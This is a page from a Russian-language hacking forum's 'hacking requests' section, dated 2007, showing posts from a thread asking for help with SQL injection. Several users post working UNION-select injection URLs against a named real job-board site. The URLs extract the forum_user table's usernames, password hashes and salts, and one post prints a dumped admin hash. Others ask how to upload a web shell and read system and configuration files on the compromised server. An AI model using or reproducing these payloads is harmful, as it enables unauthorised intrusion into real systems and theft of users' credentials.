HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > SЕО/Финансовые задачи/Социальные сети > Покупка, Продажа, Обмен > Просьбы о взломах
Перезагрузить страницу Помощь Sql Иньекции.
   
 
Страница 2 из 41 < 1 2 3 4 5 6 12 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 10.04.2007, 17:38
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию
Spyder
Цитата:
0_о в MSSQL нет оператора UNION
Бред есть.

AkyHa_MaTaTa
JET Database работает на драйверах. SQL INJ ты тут не проведешь.
 

  #12  
Старый 10.04.2007, 17:49
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию
Цитата:
Сообщение от Spyder  
жесть
да я сам долго смеялся
Цитата:
Сообщение от Spyder  
0_о в MSSQL нет оператора UNION
Может я в чем то и ощибаюсь, but:

in first: Если бы не было такого оператора MSиха послала бы куда подальше.

in second: Загляни вот сюда:http://injection.rulezz.ru/MSSQL-ASP-Injection.html

and last: почитай ман от мелкомягких: MS.Press.MCAD.MCSE.MCDB(правда на инглише).
 

  #13  
Старый 11.04.2007, 00:39
Rebel
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию
Извините за оффтопик. Но если на сайте с дырой включен MagicQuotes? Как же тогда шелл залить, into outfile ведь не работает.. А етс/пассвд безполезно расшифровывать, пароли сложные..
 

  #14  
Старый 11.04.2007, 11:46
p-range
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме:
749524

Репутация: 715
Отправить сообщение для p-range с помощью ICQ
По умолчанию
Цитата:
А етс/пассвд безполезно расшифровывать, пароли сложные..
там нет паролей
 

  #15  
Старый 11.04.2007, 12:22
ShadOS
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме:
1347723

Репутация: 1477


Отправить сообщение для ShadOS с помощью ICQ
По умолчанию
Цитата:
Сообщение от p-range  
там нет паролей
А вот и не прав. В Linux на основе ядер 2.2.x и более ранних они хранились в /etc/passwd, а файла /etc/shadow ещё не было. Хотя сейчас такие встретить очень сложно. Да и алгоритм шифрования там не такой уж и надёжный =)))
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....
 

Помощь Sql Иньекции.
  #16  
Старый 11.04.2007, 17:51
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию Помощь Sql Иньекции.
http://rabota.crimea.ua/agency.php?id=-1%20union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,VERSION()/*
дальше чето не выходит(опыта маловата), там еще magic
включено
 

  #17  
Старый 11.04.2007, 17:57
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213

Репутация: 378
По умолчанию
http://rabota.crimea.ua/agency.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,concat(username,0x3a,password)+fro m+forum_user/*

admin:f4773bcafa963af10487caa726a47458:xm|

md5 с солью
 

  #18  
Старый 11.04.2007, 18:01
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию
2InferNo23 - спасибоо!!! +
Там на форуме вобла 3.6.5 вроде стоит.
Может я немного в танке: xm| - salt, или это просто хm|
если просто xm, то можна ли из скуля достать salt?
Неохота зря брутить если xm| не salt.
Еще раз пасибо.
Последний раз редактировалось AkyHa_MaTaTa; 11.04.2007 в 18:59..
 

  #19  
Старый 11.04.2007, 19:12
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию
да я таки в танке:http://rabota.crimea.ua/agency.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 %20,16,17,18,19,20,concat(username,0x3a,password,0 x3a,salt)+from+forum_user/*
 

  #20  
Старый 11.04.2007, 22:04
Rebel
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию
Неа... Должны быть.. Там 9 хэшей есть. А шадов вообще нету похоже. Там OpenBSD стоит, шифромание Blowfish. Мне хотя бы скрипты посмотреть, но пути на сайте типа сайт/search/ или сайт/news/ Не понятно, что там Index.php не подходит и html тоже и просто search.php и news.php... Знать бы куда там апач установлен, может файл конфигурации подсмотреть тогда получится... Может кто посоветует, какие важные файлы можно еще почитать там..
 
 
Страница 2 из 41 < 1 2 3 4 5 6 12 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ПомогитЕ !!! подалуста найти кряк гейлордфакерЪ Болталка 2 30.08.2007 14:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ